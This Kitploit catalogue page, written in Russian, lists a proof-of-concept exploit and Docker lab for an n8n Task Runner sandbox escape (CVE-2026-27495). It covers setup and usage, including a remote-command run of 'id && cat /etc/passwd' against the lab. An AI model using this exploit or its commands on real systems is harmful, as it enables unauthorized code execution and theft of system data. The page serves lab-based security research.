Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-27495 — PoC-эксплойт и лабораторная среда для CVE-2026-27495 | Kitploit
Инструменты/GitHubGitHub/dexsemon/cve-2026-27495
Анализ уязвимостейАнализ КодаЭксплуатацияОбучение и ОбразованиеЭксплуатация Бинарных ФайловЛаборатории и Практика
GitHubdexsemon/cve-2026-27495

CVE-2026-27495

PoC-эксплойт и лабораторная среда для CVE-2026-27495

Репозиторий
1 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-27495 — n8n JS Task Runner: побег из песочницы

CVECVE-2026-27495
CVSS9.4 (критический)
CWECWE-94 — внедрение кода
Затронутоn8n < 1.123.22 / 2.0.0–2.9.2 / 2.10.0
Исправлено1.123.22 / 2.9.3 / 2.10.1
Поверхность атакиCode node (требуется аутентификация, Task Runners включены)

Быстрый старт

1. Развернуть уязвимую лабораторную среду

root@kitploit:~
docker compose up -d

Подождите ~15 секунд, пока n8n запустится, затем откройте http://localhost:5678 и создайте учётную запись владельца (email: [email protected], пароль: TestPassword123!).

2. Установка зависимостей

root@kitploit:~
pip install requests

3. Эксплуатация

Проверка обхода песочницы:

root@kitploit:~
python3 exploit.py --probe

RCE — раскомментируйте NODE_FUNCTION_ALLOW_BUILTIN=* в docker-compose.yml и перезапустите:

root@kitploit:~
docker compose down && docker compose up -d
python3 exploit.py --cmd "id && cat /etc/passwd"

Первичная настройка (создаёт учётную запись владельца автоматически):

root@kitploit:~
python3 exploit.py --setup --probe

Использование

root@kitploit:~
Options:
  --url URL            n8n base URL (default: http://localhost:5678)
  --email EMAIL        Login email (default: [email protected])
  --password PASSWORD  Login password
  --cmd CMD            OS command to execute (RCE)
  --setup              Create owner account (fresh instance)
  --probe              Probe sandbox escape only (no RCE, works with any config)
  --proxy PROXY        HTTP proxy (e.g. http://127.0.0.1:8080)

Отказ от ответственности

Только для авторизованных исследований в области безопасности и в образовательных целях.

Скачать инструмент